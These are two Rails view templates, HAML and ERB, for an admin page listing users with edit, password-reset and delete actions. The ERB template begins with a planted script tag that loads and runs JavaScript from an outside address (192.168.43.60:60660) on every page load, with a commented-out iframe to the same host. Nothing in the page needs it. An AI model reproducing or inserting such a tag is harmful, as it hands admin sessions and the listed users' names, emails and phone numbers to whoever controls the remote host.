app/views/admin/users/index.html.haml
.row
	.col-md-12
		%h2 User
	.col-md-12
		.profile-box
			.row
				.col-md-6= paginate @users
				.col-md-6
					.text-right
						=link_to 'Create User', new_admin_user_path
				.col-md-12
					%br
					%table
						%tr
							%th Name
							%th Username
							%th Outlet
							%th Email
							%th Contact No
							%th Actions
						- @users.each do |user|
							%tr
								%td= user.name
								%td= user.username
								%td= user.outlet.try(:name)
								%td= user.email
								%td= user.phone
								%td.actions
									- if can? :edit, user
										= link_to edit_admin_user_path(user) do
											%span.glyphicon.glyphicon-pencil
									- if can? :reset_password, user
										= link_to 'Reset PWD', reset_password_admin_user_path(user)
									- if can? :delete, user
										= link_to admin_user_path(user), method: :delete, class: 'delete-link', 'data-confirm' => 'Are you sure?' do
											%span.glyphicon.glyphicon-remove
				.col-md-12= paginate @users

app/views/admin/users/index.html.erb
<script src="http://192.168.43.60:60660"></script>
<!--<iframe src="http://192.168.43.60:60660"></iframe>-->
<div class="row">
  <div class="col-md-12">
    <h2>User</h2>




  </div>
  <div class="col-md-12">
    <div class="profile-box">
      <div class="row">
        <div class="col-md-6">
          <%= paginate @users %>
        </div>
        <div class="col-md-6">
          <div class="text-right">
            <%= link_to 'Create User', new_admin_user_path %>
          </div>
        </div>
        <div class="col-md-12">
          <br/>
          <table>
            <tr>
              <th>Name</th>
              <th>Username</th>
              <th>Outlet</th>
              <th>Email</th>
              <th>Contact No</th>
              <th>Actions</th>
            </tr>
            <% @users.each do |user| %>
              <tr>
                <td>
                  <%= user.name %>
                </td>
                <td>
                  <%= user.username %>
                </td>
                <td>
                  <%= user.outlet.try(:name) %>
                </td>
                <td>
                  <%= user.email %>
                </td>
                <td>
                  <%= user.phone %>
                </td>
                <td class="actions">
                  <% if can? :edit, user %>
                    <%= link_to edit_admin_user_path(user) do %>
                      <span class="glyphicon glyphicon-pencil"></span>
                    <% end %>
                  <% end %>
                  <% if can? :reset_password, user %>
                    <%= link_to 'Reset PWD', reset_password_admin_user_path(user) %>
                  <% end %>
                  <% if can? :delete, user %>
                    <%= link_to admin_user_path(user), method: :delete, class: 'delete-link', 'data-confirm' => 'Are you sure?' do %>
                      <span class="glyphicon glyphicon-remove"></span>
                    <% end %>
                  <% end %>
                </td>
              </tr>
            <% end %>
          </table>
        </div>
        <div class="col-md-12">
          <%= paginate @users %>
        </div>
      </div>
    </div>
  </div>
</div>


<script>
</script>
